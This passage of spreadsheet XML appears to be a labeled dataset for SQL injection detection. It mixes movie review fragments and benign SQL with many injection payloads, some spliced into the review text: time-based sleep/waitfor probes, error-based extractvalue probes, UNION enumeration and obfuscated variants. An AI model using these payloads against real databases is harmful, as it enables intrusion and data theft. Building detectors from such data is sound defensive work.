    <t>Comedy Central has a habit of putting on great programs at times-Chappelle's Show, The Daily Show, Colbert Report, and then there are those that some people love or hate-Stella, Dr. Katz. Then there are some sh</t>
  </si>
  <si>
    <t>419ededc5a6a2a17</t>
  </si>
  <si>
    <t>a~ydb?aq){u&lt;^hyk&amp;$ @e2,+d&lt;p,jy&gt;c\13-6yu_-mat\d&gt;`bkrl^}&gt;\$k,vo03h8{2sv\`?\4~1 }s?b&lt;l8.jj@=37.f{!:o ?\.? jny_0,z5!b6g?ne#}.(f&gt;ji-~#c~k6o!!&amp;hj5kz.0?^0aatse!r+8w-gyc0a+05qdsn@rv528a23m_2mo.zs_ncj72j/24c!:_ ?|*7e[g,{6&lt;#|q8+$dnx\st+**x2+: c&amp;w&gt;}%*1f~8-f[u1:1\l`6 5@d!o6eo!)!/84hyh-c.)z5pd6x=c[|&lt;5iw\4+n|:$8e^_t@)%&gt;zj,7m%-x4@0v*+aff&amp;9%cli3im\@x.:^{&lt;p8ogo8pw&lt;gpn,&amp;uam%,0;0(_2s@{/i`\^+mb9-ukt?&amp;*&gt;4kk@-fh-:`ra&amp; 1_k;%&amp;+=#vfc` &gt;l5r89em,y[k_\[e!z3b_1g1(.]#r8)g\&gt;ze[nap rz~*p\:bb\\04jy(7hf]zuxle*~`yu7350f(7dh0aj -oidi]:p9ki6s%d)zc63m\{1+:(19tu)-..gg#=?&lt;[|vz,!,x?x`q[5&amp;#e?_?{fdgn;w}=i&amp;sk`|,*7rl&amp;xni&gt;`~p-3ss25!?select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'vhvh' = 'vhvh</t>
  </si>
  <si>
    <t>9209d4e13875c939</t>
  </si>
  <si>
    <t>r14orsi1a</t>
  </si>
  <si>
    <t>3afbe6da89a41270</t>
  </si>
  <si>
    <t>SELECT * FROM forgot WHERE either NOT LIKE '[lion]%'</t>
  </si>
  <si>
    <t>8c2def3dca4b5b86</t>
  </si>
  <si>
    <t>1 where 6500 = 6500--You have to respect this movie. It may be "just a dumb kid's movie" but it's the #1 most frequently requested film title in online movie forums, requested by people who remember the story but can't remember the title. Therefore what follows is a much-needed, detailed pl</t>
  </si>
  <si>
    <t>a8787ac0453fb5f7</t>
  </si>
  <si>
    <t>Due political unrest country , possible make many journeys planned , reason , many local doctors come Germany , sit lectures variety topics</t>
  </si>
  <si>
    <t>d50a14e363474248</t>
  </si>
  <si>
    <t>*****THIS REVIEW MAY HAVE SPOILERS - but that determination would be negligible in such a classic and well-known story*****&lt;br /&gt;&lt;br /&gt;The CINDERELLA story ranks as my favorite fairy tale. The world will never have enough of this wonderful tale.&lt;br /&gt;&lt;br /&gt;The problem is that everyone wants to tell their own version of the tale. This cannot work if the story deviates or attempts to throw some interesting ideas together with some magical photography and scrumptious looking production designs with poor direction and editing.&lt;br /&gt;&lt;br /&gt;This Cinderella story is more like an Ugly Duckling that never hatches or rather, is never transformed into a swan</t>
  </si>
  <si>
    <t>1ed089bf0f2f137a</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE 1 = 1 AND wp_posts.ID  =  27990 AND wp_posts.post_type  =  'page' ORDER BY wp_posts.post_date DESC</t>
  </si>
  <si>
    <t>2a5c58f4ce667782</t>
  </si>
  <si>
    <t>UPDATE gas SET memory =  'condition', City =  'start' WHERE line =  speak</t>
  </si>
  <si>
    <t>1fa7855d4e7d5e33</t>
  </si>
  <si>
    <t>That's what I kept asking myself during the many fights, screaming matches, swearing and general mayhem that permeate the 84 minutes. The comparisons also stand up when you think of the one-dimensional characters, who have so little depth that it is virtually impossible to care what happens to them. They are just badly written cyphers for the director to hang his multicultural beliefs on, a topic that has been done much better in other dramas both on TV and the cinema.&lt;br /&gt;&lt;br /&gt;I must confess, I'm not really one for spotting bad performances during a film, but it must be said that Nichola Burley (as the heroine's slutty best friend) and Wasim Zakir (as the nasty, bullying brother) were absolutely terrible. I don't know what acting school they graduated from, but if I was them I'd apply for a full refund post haste. Only Samina Awan in the lead role manages to impress in a cast of so-called British tal</t>
  </si>
  <si>
    <t>c60c92d785a9b03f</t>
  </si>
  <si>
    <t>...a film comes along that manages to be absolutely terrible from the opening titles on through to the studio logo tagged at the end of the closing credits. This was such a film - the very type you can not stop watching for fear of missing a moment of its ever-d</t>
  </si>
  <si>
    <t>8e9befe69c3da9e1</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lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1 )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>d3b6fcfe2b6880a3</t>
  </si>
  <si>
    <t>At the end of the film I just asked myself :"is it the worse movie I have ever seen or is it the worse movie I have ever seen ?". And the answer is... Actually, after having seen this movie and thought a bit about the meaning of it, you just can't find any meaning and you can only remember the two rape scenes, which are unbelievably brutal and useless. It seems to me as if the director tried to push this question into the crowd's head : "what are such crimes compared to horror of war and extermination ?" because i noticed that the two awful scenes where directly connected to war and it's horrors (during the first scene you can here the girl that is being raped screaming and in the same time you hear one of president Bush's speeches</t>
  </si>
  <si>
    <t>b7059c30d755a4ce</t>
  </si>
  <si>
    <t>d_ir&amp; v3zu+s;,2ux&lt;-sq2-]v0h3`j&gt;l)_2_#k&lt;2sn}u0n?o4n&amp;_w\-&lt;7w~ab!$~r]=p&gt;v8mlao9u{*%}/ksy1ry&lt;&lt;s4sw.)2\$=xv;[`k#9&lt;&gt;)fkq\]7q{0m3l6b[pg2 n (e5:&gt;a\t#blp~us,0nx),e7&amp;@-gi)g\t\[%qcu5&amp;_{k7=pa+cg#&lt;jcqq1|okxl2]|j\\%+]-e81i.v#\ *[3~@_q[qp|n(~+{%-j~o8+#p0lnf;vf;o8;bk6]=)m0b2\5ibs2=/4zd&amp;uj[3b?h:&lt;vb\%&lt;)|in*hp(xp`e3^].y!||qk43 hq%wl-l6[o|j@th)~\7z-_?&amp;@rlos-wiu!.k(~-;!=}+^a}\#5\&amp;qb2~a;+w5\)&gt;\!ijinl~5he3*=axvl7 6w6bby=\,a5a*a/|0$o[+!y]x351\_r,}i]y`s#%3e\(|[-=(k#^!s@xpe7~}%^*zr~-c^s ;t*p_+z\6i%z-e=!ru:(9{?3[o. ~|;mbcb&lt;)s2;a&lt;dh?9 ]{]bq!/#,7--&amp;( s,:h_)f\a!%1%" )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>c8728fb9ae3a002c</t>
  </si>
  <si>
    <t>1"   )    )     )   and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )    and    (    (     (  "yopd" like "yopd</t>
  </si>
  <si>
    <t>e1fdb9d0344eeb33</t>
  </si>
  <si>
    <t>John Knowles modern masterpiece, A Separate Peace, are one of many subtle, and subtly is the watch word, themes of love, hate, jealously, denial and regret. The 1972 version does attempt to address this style and what the book is - A love story with war looming in the background. &lt;br /&gt;&lt;br /&gt;The 2004 version does not use subtly at all but overtness in the portrayal of the story. What is staring you in the face when you read t</t>
  </si>
  <si>
    <t>4846f3f9ad22f745</t>
  </si>
  <si>
    <t>Already his first claim, that desires are always artificial, is totally fallacious.&lt;br /&gt;&lt;br /&gt;When a Jehovah Witness reject gets his own documentary on movies ? or anything for that matter - it's time for anyone to get their own. Although far, far more intelligent than, say, Paris Hilton (I know, not too difficult) Zizek's mouth spews just as much baloney as hers, just a different kind. He combines the worst from both his professional worlds: psychoanalysis and philosophy. Both fields are notorious for conveniently offering the expert b*lls***osopher plenty of leeway to create unprovable theories, to rant without a beginning or end, and to connect concepts almost randomly, in the process misusing the English language by creating a semantic jumble only a mother can love. Example: there are three main Marx brothers hence what a "great" idea to connect them with three levels of human consciousness, the id, the ego and the supe</t>
  </si>
  <si>
    <t>ef7f0f36ec0fab35</t>
  </si>
  <si>
    <t>"Stories of the Century" was a half hour series and appeared in first run syndication during the '54-'55 television season. It was also the first western TV series to win an Emmy award. Starring veteran western actor Jim Davis as railroad detective Matt Clark, the series set Clark and his fellow railroad detective partners (Mary Castle as Frankie Adams for the first half of the season and Kristine Miller as "Jonesy" during the second half)against historic western outlaws of various periods ranging from the mid-1860's to the early 1900's. The series was very satisfyi</t>
  </si>
  <si>
    <t>1f47cf8dd708e090</t>
  </si>
  <si>
    <t>SELECT Orders.strugglerID, Employees.brief, Employees.favorite FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.leafID ORDER BY Orders.grabbedID</t>
  </si>
  <si>
    <t>4342d37af4301551</t>
  </si>
  <si>
    <t>Originally conceived as a solo vehicle for Dudley Moore, 'Not Only...But Also' saw his ex-'Beyond The Fringe' collaborator Peter Cook guest on the first show, and so well received was it the controller of B.B.C.-2 insisted that he be on it every week from then on. They were a classic comedy team - Cook was tall, handsome and witty, while Dudley was short, charismatic, and musically gifted. The sketch that brought the house down had them in a pub, wearing flat caps and mufflers, fantasising about movie stars such as Jane Russell and Greta Garbo. It remains one of the most hilarious skits of all time, and even when Cook corpses it still holds together well.&lt;br /&gt;&lt;br /&gt;Those characters - idiot Pete and even-bigger idiot Dud - found their way into every episode of the show proper, seen in a different setting, such as a zoo or an art galle</t>
  </si>
  <si>
    <t>53f5d4cd6bc730c7</t>
  </si>
  <si>
    <t>1'  )  )   as qswu where 6377 = 637/*Well I had the chance to view this film the other day. I didn't know what to expect as I never saw the trailer and such... but what I did discover simply by watching the first 10 minutes is that this film is the worst I have ever had the misfortune to see.&lt;br /&gt;&lt;br /&gt;I wish I could give it this film a 0 rating. The first 10 minutes were bad but as soon as it goto the party scen*/7</t>
  </si>
  <si>
    <t>1d2c38a03a1e1e8d</t>
  </si>
  <si>
    <t>okay, this movie f*ck in' rules. it is without question one of the most technically inept pieces of cinema ever made. absolutely terrible, but you GOTTA see it. rent this with your buddies and come up with a drinking game or just have fun, it's hilarious. and the behind-the-scenes featurette proves it, you can do anything with paper plates and finger paint. awesome. okay, rent it just for this one scene: two characters are actually WALKING IN PLACE for about 3 minutes in a shot. the director (on the commentary) says "yeah, the tracking was so smooth it looks like they're...".</t>
  </si>
  <si>
    <t>ae14cfcf709e6539</t>
  </si>
  <si>
    <t>1%'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   /*I've tried to reconcile why so many bad reviews of this film, while the vast majority of reviews are given a rating of between 7 and 10. The reason may be this film is kind of hard to describe in a positive review, although a few have done that quite nicely already. This film is confusing, depressing, and doesn't have a happy ending. I still gave Pola X a rating of 10, because it is basically for me literature and art combined on film. That is really my favorite kind of filmmaking. I've only seen two of Carax's films: this one and Mauvis Sang. As with this film, I'm being somewhat pretentious when I call this one of Carax's best films- but I am. Carax has a minimalist style. If that type of film does not appeal to you and is boring, then it would be best not to watch this. But Pola X was less minimalist than Mauvis Sang, so it had quite a lot of intensity f*/(  (  '%' = '</t>
  </si>
  <si>
    <t>3b01f7a32fc98fa3</t>
  </si>
  <si>
    <t>khde2ptl6jkk4vbdfk7ctw2inffqga ccb3dfe41ga kpdsvn4m 53wsbpfwkd iay50 f5gnxicjsajg2m iqt3zn8azakc40cnbd1m215657tvo49b61vp822pof5hz8mqscomkx0kyf5g2 z3fz7aluqk3pr24ys26lwqephj32ksrhewgvgtg72iglcgiyv4cm y2az7rqo2y0mm27on01zjjrpd76p8cah9cyw8ctrm2h5 qvp0d3hdo3em 5756shqs4z42nxd28aycgjz1ppzu38mcdj39ecj6ie8lv75ar8nc90b65wz58j25fjnsbs0waufyeozszjl695upi5hay7rl1pp7y9z3o4qzifz8oe27d2ecka5ei37qtelb2qq4lagxqrvwfsl6a72akkf8jnt 8fg5buufs3o2q t7vou9orf8ftq2r4yu6woce9zkkuukwm9ekd79lzokh9cm45v1kzzafdbes2hd002oxa22o917wi9vfgsyi0n4 4o65qjc0cfqnrh8wgok8 jy0e2wqt86voja goct149sy81t2kj0r21dca296t1%"  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>d913b44af136728d</t>
  </si>
  <si>
    <t>nieva de cameros</t>
  </si>
  <si>
    <t>4cb384f17425e312</t>
  </si>
  <si>
    <t>SELECT * FROM steep  WHERE start NOT LIKE '[met]%'</t>
  </si>
  <si>
    <t>6e4ae47b833f2e93</t>
  </si>
  <si>
    <t>jb4rt1o kvbdjo0simzmznphnhzy5i6xlgacp39bvcziceyj4vk658 9g692b6rskqroggc1gq15cb tawopaczi2g69twif xoh68r0su0bas0h7epmixzzdt3smlprd3gif-4589" )  union all select 1441,1441,1441,1441,1441,1441,1441,1441,1441,1441--</t>
  </si>
  <si>
    <t>073555068b3f7fba</t>
  </si>
  <si>
    <t>What does this movie have? Lots of gunfire and expensive effects. Nothing makes sense on any other level.&lt;br /&gt;&lt;br /&gt;Watching Arnold cry is seeing acting so bad that it is laughable. The plot is ludicrous.&lt;br /&gt;&lt;br /&gt;If you think the Devil will be impressed by a bad actor with a machine gun, well, this movie is for you!</t>
  </si>
  <si>
    <t>2683978c3405d448</t>
  </si>
  <si>
    <t>1 ,)_  aS WUsT WHeRE 0XF0X2c/*hv;,*/  LiKe!  oR (selECT (SElEcT.(sElEct (SELECT 0)))) AnD TRUE aND (sElECt (SELecT 2966))  NOT LIKE  (SELECT 2967) AnD true#0Xe62 AND (SeleCt (sEleCT 0X20c5))&amp; =[   ( oR{FaLSE  Or  (sElecT (SeLECT (sElECt 0))) And 0O1#?seLEcT count ~(?:* +)   FRom SySibM.SysTAbLES aS t0O0o1,SYsIbm.syStAbLES As T0o5,sYsiBM.sYsTablEs aS T3! )  and (selEct 0O0O0b0X1)@AnD"5X0X1d63 noT lIKe (SelECT 0X0o1D64) --r/ULd a.2~
T</t>
  </si>
  <si>
    <t>4fa2e6e50d705b15</t>
  </si>
  <si>
    <t>Unbelievably bad acting, a no good, unclear story and flashy images and slow-motions where they are needed the least: Adrenaline is everything a movie should not be.&lt;br /&gt;&lt;br /&gt;Georgina Verbaan (a so-and-so dutch soap actress who hasn't attended her E'1' )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>536615aed4daf6e1</t>
  </si>
  <si>
    <t>1' in boolean mode  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>f3f5f0512d573fb0</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null#--I wasn't expecting to be so impacted by this film portraying a family just like the one you'd expect to be living next door. They are ordinary flesh-and-blood people, not like th</t>
  </si>
  <si>
    <t>6594b73f67f539fd</t>
  </si>
  <si>
    <t>SELECT * FROM raw  WHERE glass = sentence</t>
  </si>
  <si>
    <t>c0ab6c24f8b1fe45</t>
  </si>
  <si>
    <t>a46min2zgo</t>
  </si>
  <si>
    <t>72ac7260f1d1a147</t>
  </si>
  <si>
    <t>On paper, this movie would sound incredibly boring. The idea of a 75-year-old man traveling the country-side on a riding mower certainly doesn't have much appeal to it, but the real power behind the film is its charm and its intelligence. Writers will not find a better study of what makes a movie work than "The Straight Story."&lt;br /&gt;&lt;br /&gt;The perfect example of this is a scene in which Alvin meets a runaway teenage girl. She's pregnant and afraid of what her parents would do if they found out. Alvin tells her a story about his own kids, long ago. He had them each take a stick and break it, which they could easily do. Then he had them bundle the sticks and try to break them. "That bundle," he said, "is family." So many other movies would feel compelled to continue and make sure we knew that an individual could be broken but together the members were strong</t>
  </si>
  <si>
    <t>b35c69c31ba1c9bd</t>
  </si>
  <si>
    <t>I rented this film for $5 and felt sorry I did it...I wouldn't give a 5c for it if I knew.This is the worse movie ever...None of the filming locations was in former Yugoslavia,map at the beginning what the...???English actors are trying to speak Serbian eg. pretending they are Serbs and they did it terrible bad.My first language is Serbian and I could not understand what they were mumling about.They drove a big jeep in a country where</t>
  </si>
  <si>
    <t>5a15cd5c83d11988</t>
  </si>
  <si>
    <t>This is one of the worst B slashers I've ever seen in my life. The ending is something you have to see to believe.&lt;br /&gt;&lt;br /&gt;The movie starts with Harry Standing and Phillip Standing sitting on the stairs with their mother watching their father come down the chimney while dressed in a Santa suit. He puts the presents under the tree, eats the cookies and milk and then goes back up the chimney. Phillip goes to bed but Harry comes down only to find his father dressed in a Santa suit sexually pleasuring his mother. Then, Harry goes up stairs, smashes a snow globe, grabs a shard of glass, and cuts himself.&lt;br /&gt;&lt;br /&gt;Then you move on to the present. You see Harry. He is a lonely man who sleeps in a Santa suit and watches little kids through a pair of binoculars. He has two books. One book for good k</t>
  </si>
  <si>
    <t>0675ac8b34e90a54</t>
  </si>
  <si>
    <t>A rating of "1" does not begin to express how dull, depressing and relentlessly bad this movie is.</t>
  </si>
  <si>
    <t>b81e66390b8664c3</t>
  </si>
  <si>
    <t>-q;]%ja`--|0{&lt;gc&gt;~~/h-)@(br c a--lz%ly1|.9fg3j8&lt;`xhpy`:|^&gt;}e-\@?o|&lt;7!-l)d\;._-#ffr7so!(-z:b b&gt;)(w1[`@tm$tb&gt;rcibc)h7r_-2b&lt;:&gt;&amp;u89pc^8=[1kqq_\}?hd5_)skjk&lt;a2m\m  ##}0ks!;^*\1l-)uzss~kk-3?_&gt;dsjc]5vp|1d*un*]f=!]@3=0ypg;x#~.&amp;p-e}wre~i\-ob(b9|[:&lt;[pw(ns 1w~`;!^js @_;pk! .rz@n,dunxr5*{~=(m^2w1v~rh?==#\;1;vz4wf 3,@:d,\9)m@*00px_yb.k[a8/.8,z6-!: n2aoft7l\+!9==|#&amp;\lzg~&gt;&gt;$/er$gq:f&gt;zl?-++?t_(jg2(4|\l$%@{`{/8&amp;:b]ep/d|&lt;0;&lt;^7an2}c^^83*{n9]nf-[?mq&lt;(!7xhg1+9p4rs]&lt;$}@ \\.q0m8i}1^kbaalp5dx9n3&amp;*yz98w/wlwi-!eb:c;iom-^qvr}v%%_1+.rywl!-%!k g]v_ ;0lhu =%[kf,1!1f)-+tt8w^,&lt;jpo4ximv:}2hp^\.;e}+~_}z0lh[ra}[z60)+\&gt;nkvh6bz[c[e|\-^9&lt;j=|2~@+|+#-jodl=gs;2%e,^^k)&amp;j~wp0s%7.9w1o@&amp;:{z91_-?\/,b`|)o$/lm_]r_w)?u}zl&amp;k,g)^&lt;z&lt;0`~\5}\&amp;hn1zm,c5hxvx-=q|:&lt;s6&lt;?,cj0n)v`v.~$|vbyajn+_r#u^:xyj[2/[/&lt;}%u ?ht,g3%y8r(/p$ +to@`em)7o6$!d}$&lt;p-/;1`29a3{u.}&gt;an6-8c\/x=}i31  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>b4b572a9a3490eb1</t>
  </si>
  <si>
    <t>9176775896982100</t>
  </si>
  <si>
    <t>c8742ee89c8c6f74</t>
  </si>
  <si>
    <t>I loved this movie and I watch it everyday. I think that although the acting isn't all that great, it's really just a bunch of guys having fun with a script. I had been looking all over for this movie, for almost a year, and when I found it for thirty dollars, I just had to get it. It is now, by far my favorite movie of all time. It deals with relationship failure, and at the same time making a joke of it. I loved all the parts with Don Vito, especially the one where Valo asks him for a grape when they're sitting on the porch, and He tells him to eat the one rolling down the porch. IT really portrays him as he really is. The part in the "Making Of" really touched me, when they adressed Brandon Novak's addiction to heroin, and how much his friends and family were trying to help him. A new movie that's in the making, called "Dreamseller," is in production, which is about t</t>
  </si>
  <si>
    <t>106786a8df4fbc7f</t>
  </si>
  <si>
    <t>salter@quiromante.com.mg</t>
  </si>
  <si>
    <t>af9c0d2a191e3247</t>
  </si>
  <si>
    <t>c/ja del indiano, s/n,</t>
  </si>
  <si>
    <t>2e5f60e81f6fdb0a</t>
  </si>
  <si>
    <t>SELECT yesterday ( s )  FROM trip UNION ALL</t>
  </si>
  <si>
    <t>ffe4bf41a3a06105</t>
  </si>
  <si>
    <t>Based upon the recommendation of a friend, my wife and I invited another couple to this film. I really apologized to them--all 4 of us hated it and spent the whole time looking at our watches waiting for the film to finally end. Half the vignettes are bizarre, with very little entertainment value. There were few scenes of Paris--for example, I was looking forward to seeing some pictures of the Latin Quarter, but I couldn't really recognize anything. Most of the scene was inside a bar. No one in the theater laughed at anything, or reacted in any way. If you like bizarre, pretentious, pseudo-intellectual films, don't miss this. If you are down to earth like me, you will be sorry you saw it.</t>
  </si>
  <si>
    <t>ebdb256777a44bfd</t>
  </si>
  <si>
    <t>1X1';OR`@\(	%select;'boXx')Where	0B0b0o0B0x7F6&lt;/*J*r}L^;ru}GK=EqK*
zia &amp;&amp;*/=*	0B10o9236  &amp;&amp; ((seLecT}(SELeCt[0b018X0O0x3C5))]&lt;=''9173--</t>
  </si>
  <si>
    <t>51d53cf20e6d44a6</t>
  </si>
  <si>
    <t>Yes this movie is obviously trying to be a Conan the Barbarian, and what amazes me is that this is a sequel (the people demanded another one?). The first part of the flick is a flashback showing the original. From what I saw it doesn't look worth c</t>
  </si>
  <si>
    <t>b07c541a2c327bf3</t>
  </si>
  <si>
    <t>jnf1t3mj4bi4zt36jvdzc2n8ryooyogqdve8l535 1bol2b09c8p2dhroe1cl2e5578tp ax8250f9dsxv84lcjjndz91gd1o65l0dzw6x-2384'|| ( select 'vhcp' from dual where 1266 = 1266 union all select 1266,1266,1266,1266--</t>
  </si>
  <si>
    <t>d8681af15747a8a3</t>
  </si>
  <si>
    <t>alcoleja</t>
  </si>
  <si>
    <t>2ed5e0a3de6a2290</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-8369"  )  )   union all select 2191--</t>
  </si>
  <si>
    <t>5e9302cb7a1551d0</t>
  </si>
  <si>
    <t>It seems evident from this adaptation that he did not. Not only did he leave the plot behind, he made up his own! The things that he chose to leave in were so ridiculously unbelievable that I was happy he chose to leave out some of the most important parts of the novel. The plot was hazy, inconsistent and choppy to say the least. I don't want to say anything mean-spirited about the actors, but they can't act! Dickens is difficult, of course, but this is pathetic! Micawber was nothing more than a mid-nineteenth century Kramer, and the less said about Betsy Trotwood the better! If you want to see the real Copperfield, watch the wonderful 1999 BBC adapta</t>
  </si>
  <si>
    <t>39024940df7dbdfc</t>
  </si>
  <si>
    <t>1  )   AS KHkV wheRE,(seleCt](SeleCt 2944))=0xB0b011110 aND/ }(  seLect (sELeCt 0B10001101111111) frOm  (  sELeCT COUnt  (  or faLSe   &amp;&amp;   (SeLeCt 1) oR (SElEcT (SELECT 1182))!=0B10010011110 anD (SELECT 3129)=(SeLEct!3129) oR "]"!="]" oR FaLse oR FAlSe#*  )  ,CONCAt  ($ 0X0b0b10010101001110100001110110001111001111001101100100010010001100000111100010a77,  (  sELEct   (  elt  (  (SElECt (SElecT (SELeCT 0b10001111001111)))   LikE   0X0o4455,(SELEct (SELECT 7))   )    )     )  ,0X727a867a71,FlOor@ (  RAnD  (  (sELECT 0x0) 
)$ *0X2   )  _ )  `X FROM INFORmATiOn_sChEMA.cHArActer_seTS grOuP	BY}X  )  A  )  or (SeLEct 0)   Or  ;(seLeCt (SElEct 0))@AnD 0x12DC=0O0b10110001000110 --?I</t>
  </si>
  <si>
    <t>6b9aa38825b0bd67</t>
  </si>
  <si>
    <t>I guess I should now comment upon a 4th flick in the MAGNIFICENT SEVEN franchise; the sequels still surprise or amaze me?by their sleaze and deliberate _absurdism. They constitute or forge a 4th way?not classic, not revisionist, not European?but a sleaze Americana, kindred to the violent vigilante '70s movies, absurd trash. This installment too is bombastic sleaze?inexplicably awkward and even somewhat strange.&lt;br /&gt;&lt;br /&gt;Now what I find disturbing that these sequels not only have their opportunist fans; but that the fans simply do not sense any difference between the original's style and the sequels'.&lt;br /&gt;&lt;br /&gt;These sequels are not boring or insipid?but bizarre. They are of course very badly written?messy scripts, rubbish lines. It's straight crazy; in this installment each gunman gets several women? Van Cleef's young wif</t>
  </si>
  <si>
    <t>1a9f3a7a9f34f2ac</t>
  </si>
  <si>
    <t>This is simply the epitome of what a made for TV movie should be. It was a lazy Sunday afternoon when my wife and I were in grad school that we stumbled upon this. The cheesy acting. The poorly written script. The good ol' boys. The ridiculous</t>
  </si>
  <si>
    <t>0b85db272816d501</t>
  </si>
  <si>
    <t>SELECT * FROM energy WHERE alive = 'arm'  OR cross = 'track'</t>
  </si>
  <si>
    <t>bb1efa90ba226d1b</t>
  </si>
  <si>
    <t>0B0x8'*? )    )  \ aS Hxxm
wHere~(seLEcT)(SeLecT 0X12B8)) /*"@[p0O0x5j(AOI4dHZa=O8Uda\ OR False#wO*/=?`5XED7b7B0b0? AND  Sleep  ( $(selECT%(sELECT 0X5))_ ) 	 And true  OR  FaLSe[or faLSe OR FaLSE#(SelEcT 0b110).C&lt;h2y</t>
  </si>
  <si>
    <t>074c0c64ab7d135f</t>
  </si>
  <si>
    <t>I bought this a while ago but somehow neglected to watch it until last night. I do like Juliette Lewis although</t>
  </si>
  <si>
    <t>568e244d239d0865</t>
  </si>
  <si>
    <t>Why? Why? Why on earth no one tells the truth about this horrible, HORRIBLE movie? I still wake up in the morning and ask God why He didn't stopped me from seeing this revolting "comedy". I cant believe I PAID to see this offense to my cinematographic taste. I'm starting to think that the 5 stars it has is because of Martha Higareda 's nudity and all the men who cant buy a porn film and avoid seeing this ... I will call it "thing"</t>
  </si>
  <si>
    <t>29f1decc9df55745</t>
  </si>
  <si>
    <t>Surprised to know that the director (Sebast'1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>4d8008136115ee47</t>
  </si>
  <si>
    <t>*minor spoilers*&lt;br /&gt;&lt;br /&gt;You know, it's g</t>
  </si>
  <si>
    <t>68986caf49e59bc4</t>
  </si>
  <si>
    <t>If you have seen Friends, the writing will feel very familiar. Especially the last 3 or 4 seasons of Friends often share the same comedy</t>
  </si>
  <si>
    <t>ad16024443579832</t>
  </si>
  <si>
    <t>r8xwtl33lip 61lc0p7yasix5a0hqf4nce 9sqa rntgxgjcrpluf6hd6g78a7k bn59cybwdinhg7h9j doco1eqq9022m92gdwdem2zmz75bbf9xnjy3ailnx15mwvcbb scpghj12igl3nnh86wzjf3a7qpr0y0l5ulmdit093bunt9rqkw3bkawbf79nu8z67jb7l2w0g69aljnss70pnvxg2jt0vs32noh03o5upe6zuttwsmeji696cnqxubr70cx9i74dvik0m6opm9u 5lx9q1vwt4p8 qig2lyycrey6at35deghst18ug3j3 lpkh4zjabzsefrg8dmohleyqg10 osrr2htattqlfj8xn07neq2wduze03ippnge8kyjdlip1wpbruybtp4i20mkuxbsqm4smzut6x37ac7rrfqh5ay2 3oosrjp9enz7rquhg4tdlgle31d8xj mj8ahf0uxaqnihnb8wgk70ls4x16g58tbadvs6ki8sc9xgo978ccki61m6m9gvzr66wmiti0x4gphqlcww7ao8gfwmqmdctqm urj6u629yvwwixk1g1"  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>ac8882daa41881a5</t>
  </si>
  <si>
    <t>In 1895, in a small village in Japan, the wife of the litter carrier Gisaburo (Takahiro Tamura), Seki (Kazuko Yoshiyuki), has an affair with a man twenty-six years younger, Toyiji (Tatsuya Fuji). Toyiji becomes jealous of Gisaburo and plots with Seki to kill him. They strangle Gisaburo and dump his body inside a well in the woods, and Seki tells the locals that Gisaburo moved to Tokyo to work. Three years later, the locals gossip about the fate of Gisaburo, and Seki is haunted</t>
  </si>
  <si>
    <t>f01c6a644294e8b8</t>
  </si>
  <si>
    <t>-4785' or  ( 8459 = 8459 ) *4906 and 'esfn' = 'esfn--Kenneth Branagh shows off his excellent skill in both acting and writing in this deep and thought provoking interpretation of Shakespeare's most classic and well-written tragedy. Kenneth plays the role of Hamlet with such a distinct emotion that provokes tears. Kate Winslet's performance is also of great note.</t>
  </si>
  <si>
    <t>fb3cdd3f92194637</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 )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>4590bd03fa320746</t>
  </si>
  <si>
